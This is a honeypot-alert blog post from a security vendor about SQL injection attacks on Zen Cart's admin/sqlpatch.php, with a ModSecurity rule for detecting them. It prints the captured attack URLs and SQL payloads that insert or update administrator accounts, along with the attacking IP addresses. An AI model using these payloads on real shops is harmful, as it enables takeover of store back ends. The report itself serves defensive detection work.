LevelBlue

LevelBlue + SentinelOne: Global Partnership to Deliver AI-Powered Managed Security Operations and Incident Response. Learn More

Submit RFP Request a Demo

[Honeypot Alert] Zen Cart 'admin/sqlpatch.php' SQL Injection Attacks

Change theme to light
1 Minute Read by Ryan Barnett

 

11065_a6e958ba-c74d-4c8e-9032-d1c021a9a436



 

The attacks send a POST request to the following URLs:

POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute

The attacks include a POST payload parameter called "query_string" that included the following different payloads:

 insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
 insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
 insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
 show tables;'
 update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'

As you can see, the attacker(s) are attempting to add in new user account data to the "admin" group within the back-end Zen Cart DB.

There were a total of 116 attack requests detected from 4 source IP addresses:

125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225

These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed which identifies SQL Injection attacks against this Zen Cart vulnerability:

## (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection#SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"   SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"

ABOUT LEVELBLUE

LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems
A Closer Look at the Novel and Stealthy KarstoRAT Malware
Go With the Flow: Abusing OAuth Device Code Flow

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.
© Copyright 2026